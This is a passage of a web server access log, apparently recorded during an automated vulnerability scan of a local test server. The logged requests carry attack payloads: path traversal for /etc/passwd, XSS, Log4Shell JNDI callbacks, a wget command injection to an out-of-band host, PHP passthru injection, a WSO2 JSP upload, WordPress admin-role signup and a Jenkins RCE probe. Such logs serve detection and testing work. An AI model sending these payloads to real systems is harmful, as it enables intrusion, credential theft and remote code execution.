+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /events../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PRESENTATION/EPSONCONNECT HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/release.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /provider.tf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.031","http_user_agent":"${jndi:ldap://${hostName}.useragent.ca281d8smpvb9r2g07h0k67igsyduzqcp.oast.site}", "http_referer":"${jndi:ldap://${hostName}.referer.ca281d8smpvb9r2g07h09x1q5r4xemiz3.oast.site}", "request_method":"GET", "http_x_forwarded_for":"${jndi:ldap://${hostName}.xforwardedfor.ca281d8smpvb9r2g07h0p3ffpnepuipmc.oast.site}"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;wget http://ca281d8smpvb9r2g07h0uzustx56jedg7.oast.site&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_log.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWebAdmin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfmx/CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hmc/hybris HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /interlib/report/ShowImage?localPath=C:\x5CWindows\x5Csystem.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/admin/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-----------------------------250033711231076532771336998311\x0D\x0AContent-Disposition: form-data; name=\x22../../../../repository/deployment/server/webapps/authenticationendpoint/29k9nl3avdriqpvd2eh1lpebuu1.jsp\x22;filename=\x22test.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<% out.print(\x22WSO2-RCE-CVE-2022-29464\x22); %>\x0D\x0A-----------------------------250033711231076532771336998311--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileupload/toolsAny HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=http://ca281d8smpvb9r2g07h09y8xw7qntft4o.oast.site/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"DIR_FS_DOCUMENT_ROOT=.%2F&DB_DATABASE=%27%29%3Bpassthru%28%27cat+%2Fetc%2Fpasswd%27%29%3B%2F%2A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /install/install.php?step=4 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_username\x22\x0D\x0A\x0D\x0A29K9NKqjWUUdZLEBJvovcIlLCcw\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_email\x22\x0D\x0A\x0D\x0A29K9NKqjWUUdZLEBJvovcIlLCcw@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_password\x22\x0D\x0A\x0D\x0A29K9NKqjWUUdZLEBJvovcIlLCcw@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_password_present\x22\x0D\x0A\x0D\x0Atrue\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_first_name\x22\x0D\x0A\x0D\x0A29K9NKqjWUUdZLEBJvovcIlLCcw@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_last_name\x22\x0D\x0A\x0D\x0A29K9NKqjWUUdZLEBJvovcIlLCcw@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22_wp_http_referer\x22\x0D\x0A\x0D\x0A/wp/?page_id=18\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22pp_current_url\x22\x0D\x0A\x0D\x0Ahttp://127.0.0.1\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22wp_capabilities[administrator]\x22\x0D\x0A\x0D\x0A1\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22signup_form_id\x22\x0D\x0A\x0D\x0A1\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22signup_referrer_page\x22\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0App_ajax_signup\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22melange_id\x22\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------138742543134772812001999326589--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /media../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/files/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.servlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/systemcall.php?command=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/publish.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/dam/merge/metadata.html?path=/etc&.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"cmd=cat /etc/passwd\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /debug.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hybris/hmc/hybris HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/sys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authenticationendpoint/29k9nl3avdriqpvd2eh1lpebuu1.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=http://ca281d8smpvb9r2g07h04rq5q83s74xm4.oast.site/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucees3ezf%3cimg%20src%3da%20onerror%3dalert('29K9NJUHNvCdJj43P0P0vRbzqDP')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib/upgrade.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/includes/configure.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"log=29K9NKqjWUUdZLEBJvovcIlLCcw@example.com&pwd=29K9NKqjWUUdZLEBJvovcIlLCcw@example.com&wp-submit=Log+In","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/add-on/business-continuity/api/cruise_config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///querybuilder.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/deploy.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /well-known/apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 